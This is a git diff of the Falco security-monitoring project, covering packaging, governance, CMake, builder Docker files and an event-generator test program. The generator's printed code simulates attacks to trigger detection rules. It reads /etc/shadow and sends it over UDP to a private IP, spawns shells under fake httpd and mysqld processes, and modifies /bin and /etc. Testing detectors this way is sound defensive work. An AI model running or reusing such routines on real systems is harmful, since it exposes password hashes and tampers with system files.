set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cpack/debian/conffiles")
set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
set(CPACK_RPM_PACKAGE_URL "http://www.sysdig.org")
set(CPACK_RPM_PACKAGE_REQUIRES "dkms, gcc, make, kernel-devel, perl")
set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postinstall")
set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/preuninstall")
set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postuninstall")
set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION /usr/src /usr/share/man /usr/share/man/man8 /etc /usr /usr/bin /usr/share /etc/rc.d /etc/rc.d/init.d)
set(CPACK_RPM_EXCLUDE_FROM_AUTO_FILELIST_ADDITION /usr/src /usr/share/man /usr/share/man/man8 /etc /usr /usr/bin /usr/share /etc/rc.d /etc/rc.d/init.d )
set(CPACK_RPM_PACKAGE_RELOCATABLE "OFF")
include(CPack)

9
CODE_OF_CONDUCT.md → CODE_OF_CONDUCT
View File

@@ -1,6 +1,6 @@
# CNCF Community Code of Conduct v1.0
## CNCF Community Code of Conduct v1.0
## Contributor Code of Conduct
### Contributor Code of Conduct
As contributors and maintainers of this project, and in the interest of fostering
an open and welcoming community, we pledge to respect all people who contribute
@@ -32,7 +32,8 @@ Conduct may be permanently removed from the project team.
This code of conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community.
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting a CNCF project maintainer, [Sarah Novotny](mailto:sarahnovotny@google.com), and/or [Dan Kohn](mailto:dan@linuxfoundation.org).
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting a CNCF project maintainer, Sarah Novotny <sarahnovotny@google.com>, and/or Dan Kohn <dan@linuxfoundation.org>.
This Code of Conduct is adapted from the [Contributor Covenant](http://contributor-covenant.org), version 1.2.0, available at
This Code of Conduct is adapted from the Contributor Covenant
(http://contributor-covenant.org), version 1.2.0, available at
http://contributor-covenant.org/version/1/2/0/

4
CONTRIBUTING.md
View File

@@ -12,7 +12,7 @@
## Code of Conduct
Falco has a
[Code of Conduct](CODE_OF_CONDUCT.md)
[Code of Conduct](CODE_OF_CONDUCT)
to which all contributors must adhere, please read it before interacting with the repository or the community in any way.
## Issues
@@ -87,7 +87,7 @@ need a kind, make sure to specify the appropriate one by typing `/kind <KIND>`.
The list of labels is [here](https://github.com/falcosecurity/falco/labels).
Also feel free to suggest a reviewer with `/cc @theirname`, or to assign an assignee using `/assign @nickname`.
Also feel free to suggest a reviewer with `/assign @theirname`.
Once your reviewer is happy, they will say `/lgtm` which will apply the
`lgtm` label, and will apply the `approved` label if they are an

2
COPYING
View File

@@ -187,7 +187,7 @@
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright 2019 The Falco Authors
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.

0
GOVERNANCE.md → GOVERNANCE
View File

11
MAINTAINERS Normal file
View File

@@ -0,0 +1,11 @@
Current maintainers:
@mstemm - Mark Stemm <mark.stemm@sysdig.com>
@ldegio - Loris Degioanni <loris@sysdig.com>
@fntlnz - Lorenzo Fontana <lo@sysdig.com>
@leodido - Leonardo Di Donato <leo@sysdig.com>
Community Mangement:
@mfdii - Michael Ducy <michael@sysdig.com>
Emeritus maintainers:
@henridf - Henri Dubois-Ferriere <henri.dubois-ferriere@sysdig.com>

9
OWNERS
View File

@@ -1,12 +1,11 @@
approvers:
- fntlnz
- kris-nova
- leodido
- fntlnz
- mstemm
reviewers:
- fntlnz
- kaizhe
- kris-nova
- leodido
- fntlnz
- mfdii
- kaizhe
- mstemm

11
README.md
View File

@@ -5,7 +5,7 @@
#### Latest release
**v0.18.0**
**v0.16.0**
Read the [change log](https://github.com/falcosecurity/falco/blob/dev/CHANGELOG.md)
Dev Branch: [![Build Status](https://travis-ci.com/falcosecurity/falco.svg?branch=dev)](https://travis-ci.com/falcosecurity/falco)<br />
@@ -45,17 +45,10 @@ See [Falco Documentation](https://falco.org/docs/) to quickly get started using
Join the Community
---
* [Join the mailing list](http://bit.ly/2Mu0wXA) for news and a Google calendar invite for our Falco open source meetings. Note: this is the only way to get a calendar invite for our open meetings.
* [Website](https://falco.org) for Falco.
* We are working on a blog for the Falco project. In the meantime you can find [Falco](https://sysdig.com/blog/tag/falco/) posts over on the Sysdig blog.
* Join our [Public Slack](https://slack.sysdig.com) channel for open source Sysdig and Falco announcements and discussions.
Office hours
---
Falco has bi-weekly office hour style meetings where we plan our work on the project. You can get a Google calendar invite by joining the mailing list. It will automatically be sent.
Wednesdays at 8am Pacific on [Zoom](https://sysdig.zoom.us/j/213235330).
License Terms
---
Falco is licensed to you under the [Apache 2.0](./COPYING) open source license.

3
cmake/modules/DownloadCatch.cmake
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2019 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of

3
cmake/modules/DownloadFakeIt.cmake
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2019 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of

168
cmake/modules/GetGitRevisionDescription.cmake
View File

@@ -1,168 +0,0 @@
# - Returns a version string from Git
#
# These functions force a re-configure on each git commit so that you can
# trust the values of the variables in your build system.
#
# get_git_head_revision(<refspecvar> <hashvar> [<additional arguments to git describe> ...])
#
# Returns the refspec and sha hash of the current head revision
#
# git_describe(<var> [<additional arguments to git describe> ...])
#
# Returns the results of git describe on the source tree, and adjusting
# the output so that it tests false if an error occurs.
#
# git_get_exact_tag(<var> [<additional arguments to git describe> ...])
#
# Returns the results of git describe --exact-match on the source tree,
# and adjusting the output so that it tests false if there was no exact
# matching tag.
#
# git_local_changes(<var>)
#
# Returns either "CLEAN" or "DIRTY" with respect to uncommitted changes.
# Uses the return code of "git diff-index --quiet HEAD --".
# Does not regard untracked files.
#
# Requires CMake 2.6 or newer (uses the 'function' command)
#
# Original Author:
# 2009-2010 Ryan Pavlik <rpavlik@iastate.edu> <abiryan@ryand.net>
# http://academic.cleardefinition.com
# Iowa State University HCI Graduate Program/VRAC
#
# Copyright Iowa State University 2009-2010.
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
if(__get_git_revision_description)
return()
endif()
set(__get_git_revision_description YES)
# We must run the following at "include" time, not at function call time,
# to find the path to this module rather than the path to a calling list file
get_filename_component(_gitdescmoddir ${CMAKE_CURRENT_LIST_FILE} PATH)
function(get_git_head_revision _refspecvar _hashvar)
set(GIT_PARENT_DIR "${CMAKE_CURRENT_SOURCE_DIR}")
set(GIT_DIR "${GIT_PARENT_DIR}/.git")
while(NOT EXISTS "${GIT_DIR}") # .git dir not found, search parent directories
set(GIT_PREVIOUS_PARENT "${GIT_PARENT_DIR}")
get_filename_component(GIT_PARENT_DIR ${GIT_PARENT_DIR} PATH)
if(GIT_PARENT_DIR STREQUAL GIT_PREVIOUS_PARENT)
# We have reached the root directory, we are not in git
set(${_refspecvar} "GITDIR-NOTFOUND" PARENT_SCOPE)
set(${_hashvar} "GITDIR-NOTFOUND" PARENT_SCOPE)
return()
endif()
set(GIT_DIR "${GIT_PARENT_DIR}/.git")
endwhile()
# check if this is a submodule
if(NOT IS_DIRECTORY ${GIT_DIR})
file(READ ${GIT_DIR} submodule)
string(REGEX REPLACE "gitdir: (.*)\n$" "\\1" GIT_DIR_RELATIVE ${submodule})
get_filename_component(SUBMODULE_DIR ${GIT_DIR} PATH)
get_filename_component(GIT_DIR ${SUBMODULE_DIR}/${GIT_DIR_RELATIVE} ABSOLUTE)
endif()
set(GIT_DATA "${CMAKE_CURRENT_BINARY_DIR}/CMakeFiles/git-data")
if(NOT EXISTS "${GIT_DATA}")
file(MAKE_DIRECTORY "${GIT_DATA}")
endif()
if(NOT EXISTS "${GIT_DIR}/HEAD")
return()
endif()
set(HEAD_FILE "${GIT_DATA}/HEAD")
configure_file("${GIT_DIR}/HEAD" "${HEAD_FILE}" COPYONLY)
configure_file("${_gitdescmoddir}/GetGitRevisionDescription.cmake.in"
"${GIT_DATA}/grabRef.cmake"
@ONLY)
include("${GIT_DATA}/grabRef.cmake")
set(${_refspecvar} "${HEAD_REF}" PARENT_SCOPE)
set(${_hashvar} "${HEAD_HASH}" PARENT_SCOPE)
endfunction()
function(git_describe _var)
if(NOT GIT_FOUND)
find_package(Git QUIET)
endif()
get_git_head_revision(refspec hash)
if(NOT GIT_FOUND)
set(${_var} "GIT-NOTFOUND" PARENT_SCOPE)
return()
endif()
if(NOT hash)
set(${_var} "HEAD-HASH-NOTFOUND" PARENT_SCOPE)
return()
endif()
# TODO sanitize
#if((${ARGN}" MATCHES "&&") OR
# (ARGN MATCHES "||") OR
# (ARGN MATCHES "\\;"))
# message("Please report the following error to the project!")
# message(FATAL_ERROR "Looks like someone's doing something nefarious with git_describe! Passed arguments ${ARGN}")
#endif()
# message(STATUS "Arguments to execute_process: ${ARGN}")
execute_process(COMMAND
"${GIT_EXECUTABLE}"
describe
${hash}
${ARGN}
WORKING_DIRECTORY
"${CMAKE_CURRENT_SOURCE_DIR}"
RESULT_VARIABLE
res
OUTPUT_VARIABLE
out
ERROR_QUIET
OUTPUT_STRIP_TRAILING_WHITESPACE)
if(NOT res EQUAL 0)
set(out "${out}-${res}-NOTFOUND")
endif()
set(${_var} "${out}" PARENT_SCOPE)
endfunction()
function(git_get_exact_tag _var)
git_describe(out --exact-match ${ARGN})
set(${_var} "${out}" PARENT_SCOPE)
endfunction()
function(git_local_changes _var)
if(NOT GIT_FOUND)
find_package(Git QUIET)
endif()
get_git_head_revision(refspec hash)
if(NOT GIT_FOUND)
set(${_var} "GIT-NOTFOUND" PARENT_SCOPE)
return()
endif()
if(NOT hash)
set(${_var} "HEAD-HASH-NOTFOUND" PARENT_SCOPE)
return()
endif()
execute_process(COMMAND
"${GIT_EXECUTABLE}"
diff-index --quiet HEAD --
WORKING_DIRECTORY
"${CMAKE_CURRENT_SOURCE_DIR}"
RESULT_VARIABLE
res
OUTPUT_VARIABLE
out
ERROR_QUIET
OUTPUT_STRIP_TRAILING_WHITESPACE)
if(res EQUAL 0)
set(${_var} "CLEAN" PARENT_SCOPE)
else()
set(${_var} "DIRTY" PARENT_SCOPE)
endif()
endfunction()

41
cmake/modules/GetGitRevisionDescription.cmake.in
View File

@@ -1,41 +0,0 @@
#
# Internal file for GetGitRevisionDescription.cmake
#
# Requires CMake 2.6 or newer (uses the 'function' command)
#
# Original Author:
# 2009-2010 Ryan Pavlik <rpavlik@iastate.edu> <abiryan@ryand.net>
# http://academic.cleardefinition.com
# Iowa State University HCI Graduate Program/VRAC
#
# Copyright Iowa State University 2009-2010.
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
set(HEAD_HASH)
file(READ "@HEAD_FILE@" HEAD_CONTENTS LIMIT 1024)
string(STRIP "${HEAD_CONTENTS}" HEAD_CONTENTS)
if(HEAD_CONTENTS MATCHES "ref")
# named branch
string(REPLACE "ref: " "" HEAD_REF "${HEAD_CONTENTS}")
if(EXISTS "@GIT_DIR@/${HEAD_REF}")
configure_file("@GIT_DIR@/${HEAD_REF}" "@GIT_DATA@/head-ref" COPYONLY)
else()
configure_file("@GIT_DIR@/packed-refs" "@GIT_DATA@/packed-refs" COPYONLY)
file(READ "@GIT_DATA@/packed-refs" PACKED_REFS)
if(${PACKED_REFS} MATCHES "([0-9a-z]*) ${HEAD_REF}")
set(HEAD_HASH "${CMAKE_MATCH_1}")
endif()
endif()
else()
# detached HEAD
configure_file("@GIT_DIR@/HEAD" "@GIT_DATA@/head-ref" COPYONLY)
endif()
if(NOT HEAD_HASH)
file(READ "@GIT_DATA@/head-ref" HEAD_HASH LIMIT 1024)
string(STRIP "${HEAD_HASH}" HEAD_HASH)
endif()

2
docker/OWNERS
View File

@@ -1,2 +0,0 @@
labels:
- area/integration

30
docker/README.md
View File

@@ -1,30 +0,0 @@
# Falco Dockerfiles
This directory contains the various ways to package Falco as a container.
## Currently Supported Containers
### `falcosecurity/falco` Dockerfiles
- `./dev`: Builds a container image from the `dev` apt repo.
- `./stable`: Builds a container image from the `stable` apt repo.
- `./local`: Builds a container image from a locally provided Falco `dpkg` package.
### Build & Testing Dockerfiles
- `./builder`: `falcosecurity/falco-builder` - The complete build tool chain for compiling Falco from source. See [the documentation](https://falco.org/docs/source/) for more details on building from source.
- `./tester`: `falcosecurity/falco-tester` - Container image for running the Falco test suite.
## Alpha Release Containers
These Dockerfiles (and resulting container images) are currently in `alpha`. We'd love for you to test these images and [report any feedback](https://github.com/falcosecurity/falco/issues/new/choose).
### Slim and Minimal Dockerfiles
The goal of these container images is to reduce the size of the underlying Falco container.
- `./slim-dev`: Like `./dev` above but removes build tools for older kernels.
- `./slim-stable`: Like `./stable` above but removes build tools for older kernels.
- `./minimal`: A minimal container image (~20mb), containing only the files required to run Falco.
### Init Containers
These container images allow for the delivery of the kernel module or eBPF probe either via HTTP or via a container image.
- `kernel/linuxkit`: Multistage Dockerfile to build a Falco kernel module for Linuxkit (Docker Desktop). Generates an alpine based container image with the kernel module, and `insmod` as the container `CMD`.
- `kernel/probeloader`: Multistage Dockerfile to build a Go based application to download (via HTTPS) and load a Falco kernel module. The resulting container image can be ran as an `initContainer` to load the Falco module before Falco starts.

93
docker/builder/Dockerfile
View File

@@ -1,49 +1,52 @@
FROM centos:7
FROM centos:6
LABEL name="falcosecurity/falco-builder"
LABEL usage="docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder cmake"
LABEL maintainer="opensource@sysdig.com"
ENV FALCO_VERSION 0.1.1dev
ENV BUILD_TYPE Release
ENV BUILD_DRIVER OFF
ENV BUILD_BPF OFF
ENV BUILD_WARNINGS_AS_ERRORS ON
ENV MAKE_JOBS 4
ARG BUILD_TYPE=release
ARG BUILD_DRIVER=OFF
ARG BUILD_BPF=OFF
ARG BUILD_WARNINGS_AS_ERRORS=ON
ARG MAKE_JOBS=4
ARG FALCO_VERSION
# copied from builder script
RUN curl -o /etc/yum.repos.d/devtools-2.repo https://people.centos.org/tru/devtools-2/devtools-2.repo && \
rpm -i http://mirror.pnl.gov/epel/6/i386/epel-release-6-8.noarch.rpm && \
sed -e 's,$basearch,i386,' -e 's,$releasever\],$releasever-i686\],' /etc/yum.repos.d/devtools-2.repo > /etc/yum.repos.d/devtools-2-i686.repo && \
yum -y install \
createrepo \
devtoolset-2-toolchain \
dpkg \
dpkg-devel \
expect \
gcc \
gcc-c++ \
git \
glibc-static \
libcurl-devel \
make \
curl \
libcurl-devel \
zlib-devel \
pkg-config \
rpm-build \
unzip \
wget \
tar \
autoconf \
automake \
libtool && \
yum -y install \
glibc-devel.i686 \
devtoolset-2-libstdc++-devel.i686 \
devtoolset-2-elfutils-libelf-devel && \
yum clean all
RUN curl -o docker.tgz https://get.docker.com/builds/Linux/x86_64/docker-1.11.0.tgz && \
tar xfz docker.tgz docker/docker && \
mv docker/docker /usr/local/bin/docker && \
chmod +x /usr/local/bin/docker && \
rm -fr docker.tgz docker/
ENV BUILD_TYPE=${BUILD_TYPE}
ENV BUILD_DRIVER=${BUILD_DRIVER}
ENV BUILD_BPF=${BUILD_BPF}
ENV BUILD_WARNINGS_AS_ERRORS=${BUILD_WARNINGS_AS_ERRORS}
ENV MAKE_JOBS=${MAKE_JOBS}
ENV FALCO_VERSION=${FALCO_VERSION}
# TEMPORARY until dependencies in CMakeLists.txt are fixed
RUN yum -y install libyaml-devel
COPY entrypoint.sh /
ARG DOCKER_VERSION=1.11.0
ARG CMAKE_VERSION=3.5.0
RUN yum -y install centos-release-scl && \
INSTALL_PKGS="devtoolset-7-gcc devtoolset-7-gcc-c++ devtoolset-7-toolchain devtoolset-7-libstdc++-devel devtoolset-7-elfutils-libelf-devel glibc-static autoconf automake libtool createrepo expect git which libcurl-devel zlib-devel rpm-build" && \
yum -y install --setopt=tsflags=nodocs $INSTALL_PKGS && \
rpm -V $INSTALL_PKGS
RUN source scl_source enable devtoolset-7 && \
cd /tmp && \
curl -L https://github.com/kitware/cmake/releases/download/v${CMAKE_VERSION}/cmake-${CMAKE_VERSION}.tar.gz | tar xz; \
cd cmake-${CMAKE_VERSION} && \
./bootstrap --system-curl && \
make -j${MAKE_JOBS} && \
make install && \
rm -rf /tmp/cmake-${CMAKE_VERSION}
# fixme: deps needs a fix into CMakeLists.txt
RUN yum -y install libyaml-devel && yum clean all -y
COPY ./root /
# DTS
ENV BASH_ENV=/usr/bin/scl_enable \
ENV=/usr/bin/scl_enable \
PROMPT_COMMAND=". /usr/bin/scl_enable"
ENTRYPOINT ["entrypoint"]
CMD ["usage"]
ENTRYPOINT ["/entrypoint.sh"]

40
docker/builder/entrypoint.sh Executable file
View File

@@ -0,0 +1,40 @@
#!/bin/bash
set -euxo pipefail
SOURCE_DIR=/source
BUILD_DIR=/build
TASK=${1:-all}
MANPATH=
. /opt/rh/devtoolset-2/enable
# Download and install cmake if not downloaded
CMAKE_DIR=$BUILD_DIR/cmake
if [ ! -e $CMAKE_DIR ]; then
cd $BUILD_DIR
mkdir -p $BUILD_DIR/cmake
wget -nv https://s3.amazonaws.com/download.draios.com/dependencies/cmake-3.3.2.tar.gz
tar -C $CMAKE_DIR --strip-components 1 -xzf cmake-3.3.2.tar.gz
cd $CMAKE_DIR
./bootstrap --system-curl
make -j$MAKE_JOBS
fi
if [ $TASK == "cmake" ]; then
mkdir -p $BUILD_DIR/$BUILD_TYPE
cd $BUILD_DIR/$BUILD_TYPE
$CMAKE_DIR/bin/cmake -DCMAKE_BUILD_TYPE=$BUILD_TYPE -DFALCO_VERSION=$FALCO_VERSION -DCMAKE_INSTALL_PREFIX=/usr -DBUILD_DRIVER=${BUILD_DRIVER} -DBUILD_BPF=${BUILD_BPF} -DBUILD_WARNINGS_AS_ERRORS=${BUILD_WARNINGS_AS_ERRORS} $SOURCE_DIR/falco
exit 0
fi
if [ $TASK == "bash" ]; then
exec /bin/bash
fi
cd $BUILD_DIR/$BUILD_TYPE
make -j$MAKE_JOBS $TASK

62
docker/builder/root/usr/bin/entrypoint
View File

@@ -1,62 +0,0 @@
#!/usr/bin/env bash
set -eu -o pipefail
SOURCE_DIR=/source
BUILD_DIR=/build
CMD=${1:-usage}
shift
# Build type can be "debug" or "release", fallbacks to "release" by default
BUILD_TYPE=$(echo "$BUILD_TYPE" | tr "[:upper:]" "[:lower:]")
DRAIOS_DEBUG_FLAGS=
case "$BUILD_TYPE" in
"debug")
DRAIOS_DEBUG_FLAGS="-D_DEBUG -DNDEBUG"
;;
*)
BUILD_TYPE="release"
;;
esac
case "$CMD" in
"cmake")
# Check that source directory contains Falco and Sysdig
if [ ! -d "$SOURCE_DIR/sysdig" ]; then
echo "Missing sysdig source." >&2
exit 1
fi
if [ ! -d "$SOURCE_DIR/falco" ]; then
echo "Missing falco source." >&2
exit 1
fi
# Prepare build directory
mkdir -p "$BUILD_DIR/$BUILD_TYPE"
cd "$BUILD_DIR/$BUILD_TYPE"
cmake \
-DCMAKE_BUILD_TYPE="$BUILD_TYPE" \
-DCMAKE_INSTALL_PREFIX=/usr \
-DBUILD_DRIVER="$BUILD_DRIVER" \
-DBUILD_BPF="$BUILD_BPF" \
-DBUILD_WARNINGS_AS_ERRORS="$BUILD_WARNINGS_AS_ERRORS" \
-DFALCO_VERSION="$FALCO_VERSION" \
-DDRAIOS_DEBUG_FLAGS="$DRAIOS_DEBUG_FLAGS" \
"$SOURCE_DIR/falco"
exit "$(printf '%d\n' $?)"
;;
"bash")
CMD=/bin/bash
;& # fallthrough
"usage")
exec "$CMD" "$@"
;;
*)
if [ ! -d "$BUILD_DIR/$BUILD_TYPE" ]; then
echo "Missing $BUILD_DIR/$BUILD_TYPE directory: run cmake."
exit 1
fi
cd "$BUILD_DIR/$BUILD_TYPE"
make -j"$MAKE_JOBS" "$CMD"
;;
esac

6
docker/builder/root/usr/bin/scl_enable
View File

@@ -1,6 +0,0 @@
# IMPORTANT: Do not add more content to this file unless you know what you are doing.
# This file is sourced everytime the shell session is opened.
#
# This will make scl collection binaries work out of box.
unset BASH_ENV PROMPT_COMMAND ENV
source scl_source enable devtoolset-7

51
docker/builder/root/usr/bin/usage
View File

@@ -1,51 +0,0 @@
#!/usr/bin/env bash
gccversion=$(gcc --version | head -n1)
cppversion=$(g++ -dM -E -x c++ /dev/null | grep -F __cplusplus | cut -d' ' -f3)
cmakeversion=$(cmake --version | head -n1)
cat <<EOF
Hello, this is the Falco builder container.
How to use.
The default commands for the Falco builder image reports usage and environment info.
* docker run falcosecurity/falco-builder
* docker run falcosecurity/falco-builder usage
It supports bash.
* docker run -ti falcosecurity/falco-builder bash
To build Falco it needs:
- a bind-mount on the source directory (ie., the directory containing falco and sysdig source as siblings)
Optionally, you can also bind-mount the build directory.
So, you can execute it from the Falco root directory as follows.
* docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder cmake
* docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder [<cmake-target-x>, ..., <cmake-target-y>]
Eg.,
* docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder tests
* docker run -v $PWD/..:/source -v $PWD/build:/build falcosecurity/falco-builder install
How to build.
* cd docker/builder && DOCKER_BUILDKIT=1 docker build -t falcosecurity/falco-builder .
In case you want to customise the builder at build time the following build arguments are provided:
- BUILD_TYPE whether you want a "release" or "debug" build (defaults to "release").
- BUILD_DRIVER whether to build the driver or not (defaults to "OFF")
- BUILD_BPF whether to build the BPF driver or not (defaults to "OFF")
- BUILD_WARNINGS_AS_ERRORS whether to intend warnings as errors or not (defaults to "ON")
- MAKE_JOBS the number of jobs to use during make (defaults to "4")
- FALCO_VERSION the version to label the build (built from git index in case it is missing)
It is possible to change these at runtime (in the container) since environment variables with the same names are provided, too.
Environment.
* ${gccversion}
* cplusplus ${cppversion}
* ${cmakeversion}
EOF

2
docker/dev/Dockerfile
View File

@@ -1,6 +1,6 @@
FROM debian:unstable
LABEL maintainer="opensource@sysdig.com"
LABEL maintainer="Sysdig <support@sysdig.com>"
ENV FALCO_REPOSITORY dev

3
docker/dev/docker-entrypoint.sh
View File

@@ -1,7 +1,8 @@
#!/bin/bash
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

1
docker/event-generator/Dockerfile
View File

@@ -1,5 +1,4 @@
FROM alpine:latest
LABEL maintainer="opensource@sysdig.com"
RUN apk add --no-cache bash g++
COPY ./event_generator.cpp /usr/local/bin
RUN mkdir -p /var/lib/rpm

3
docker/event-generator/Makefile
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

118
docker/event-generator/event_generator.cpp
View File

@@ -1,5 +1,7 @@
/*
Copyright (C) 2019 The Falco Authors.
Copyright (C) 2016-2018 Draios Inc dba Sysdig.
This file is part of falco.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
@@ -12,6 +14,7 @@ distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <cstdio>
@@ -88,6 +91,7 @@ void open_file(const char *filename, const char *flags)
{
fprintf(stderr, "Could not open %s for writing: %s\n", filename, strerror(errno));
}
}
void exfiltration()
@@ -106,7 +110,7 @@ void exfiltration()
string line;
string shadow_contents;
while(getline(shadow, line))
while (getline(shadow, line))
{
shadow_contents += line;
shadow_contents += "\n";
@@ -121,13 +125,13 @@ void exfiltration()
dest.sin_port = htons(8197);
inet_aton("10.5.2.6", &(dest.sin_addr));
if((rc = connect(sock, (struct sockaddr *)&dest, sizeof(dest))) != 0)
if((rc = connect(sock, (struct sockaddr *) &dest, sizeof(dest))) != 0)
{
fprintf(stderr, "Could not bind listening socket to dest: %s\n", strerror(errno));
return;
}
if((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
if ((sent = send(sock, shadow_contents.c_str(), shadow_contents.size(), 0)) != shadow_contents.size())
{
fprintf(stderr, "Could not send shadow contents via udp datagram: %s\n", strerror(errno));
return;
@@ -170,7 +174,7 @@ void spawn(const char *cmd, char **argv, char **env)
pid_t child;
// Fork a process, that way proc.duration is reset
if((child = fork()) == 0)
if ((child = fork()) == 0)
{
execve(cmd, argv, env);
fprintf(stderr, "Could not exec to spawn %s: %s\n", cmd, strerror(errno));
@@ -184,97 +188,86 @@ void spawn(const char *cmd, char **argv, char **env)
void respawn(const char *cmd, const char *action, const char *interval)
{
char *argv[] = {(char *)cmd,
(char *)"--action", (char *)action,
(char *)"--interval", (char *)interval,
(char *)"--once", NULL};
char *argv[] = {(char *) cmd,
(char *) "--action", (char *) action,
(char *) "--interval", (char *) interval,
(char *) "--once", NULL};
char *env[] = {NULL};
spawn(cmd, argv, env);
}
void write_binary_dir()
{
void write_binary_dir() {
printf("Writing to /bin/created-by-event-generator-sh...\n");
touch("/bin/created-by-event-generator-sh");
}
void write_etc()
{
void write_etc() {
printf("Writing to /etc/created-by-event-generator-sh...\n");
touch("/etc/created-by-event-generator-sh");
}
void read_sensitive_file()
{
void read_sensitive_file() {
printf("Reading /etc/shadow...\n");
read("/etc/shadow");
}
void read_sensitive_file_after_startup()
{
void read_sensitive_file_after_startup() {
printf("Becoming the program \"httpd\", sleeping 6 seconds and reading /etc/shadow...\n");
respawn("./httpd", "read_sensitive_file", "6");
}
void write_rpm_database()
{
void write_rpm_database() {
printf("Writing to /var/lib/rpm/created-by-event-generator-sh...\n");
touch("/var/lib/rpm/created-by-event-generator-sh");
}
void spawn_shell()
{
void spawn_shell() {
printf("Spawning a shell to run \"ls > /dev/null\" using system()...\n");
int rc;
if((rc = system("ls > /dev/null")) != 0)
if ((rc = system("ls > /dev/null")) != 0)
{
fprintf(stderr, "Could not run ls > /dev/null in a shell: %s\n", strerror(errno));
}
}
void spawn_shell_under_httpd()
{
void spawn_shell_under_httpd() {
printf("Becoming the program \"httpd\" and then spawning a shell\n");
respawn("./httpd", "spawn_shell", "0");
}
void db_program_spawn_process()
{
void db_program_spawn_process() {
printf("Becoming the program \"mysql\" and then running ls\n");
respawn("./mysqld", "exec_ls", "0");
}
void modify_binary_dirs()
{
void modify_binary_dirs() {
printf("Moving /bin/true to /bin/true.event-generator-sh and back...\n");
if(rename("/bin/true", "/bin/true.event-generator-sh") != 0)
if (rename("/bin/true", "/bin/true.event-generator-sh") != 0)
{
fprintf(stderr, "Could not rename \"/bin/true\" to \"/bin/true.event-generator-sh\": %s\n", strerror(errno));
}
else
{
if(rename("/bin/true.event-generator-sh", "/bin/true") != 0)
if (rename("/bin/true.event-generator-sh", "/bin/true") != 0)
{
fprintf(stderr, "Could not rename \"/bin/true.event-generator-sh\" to \"/bin/true\": %s\n", strerror(errno));
}
}
}
void mkdir_binary_dirs()
{
void mkdir_binary_dirs() {
printf("Creating directory /bin/directory-created-by-event-generator-sh...\n");
if(mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
if (mkdir("/bin/directory-created-by-event-generator-sh", 0644) != 0)
{
fprintf(stderr, "Could not create directory \"/bin/directory-created-by-event-generator-sh\": %s\n", strerror(errno));
}
}
void change_thread_namespace()
{
void change_thread_namespace() {
printf("Calling setns() to change namespaces...\n");
printf("NOTE: does not result in a falco notification in containers, unless container run with --privileged or --security-opt seccomp=unconfined\n");
// It doesn't matter that the arguments to setns are
@@ -283,13 +276,12 @@ void change_thread_namespace()
setns(0, 0);
}
void system_user_interactive()
{
void system_user_interactive() {
pid_t child;
printf("Forking a child that becomes user=daemon and then tries to run /bin/login...\n");
// Fork a child and do everything in the child.
if((child = fork()) == 0)
if ((child = fork()) == 0)
{
become_user("daemon");
char *argv[] = {(char *)"/bin/login", NULL};
@@ -304,8 +296,7 @@ void system_user_interactive()
}
}
void network_activity()
{
void network_activity() {
printf("Connecting a udp socket to 10.2.3.4:8192...\n");
int rc;
int sock = socket(PF_INET, SOCK_DGRAM, 0);
@@ -315,7 +306,7 @@ void network_activity()
localhost.sin_port = htons(8192);
inet_aton("10.2.3.4", &(localhost.sin_addr));
if((rc = connect(sock, (struct sockaddr *)&localhost, sizeof(localhost))) != 0)
if((rc = connect(sock, (struct sockaddr *) &localhost, sizeof(localhost))) != 0)
{
fprintf(stderr, "Could not bind listening socket to localhost: %s\n", strerror(errno));
return;
@@ -324,20 +315,18 @@ void network_activity()
close(sock);
}
void system_procs_network_activity()
{
void system_procs_network_activity() {
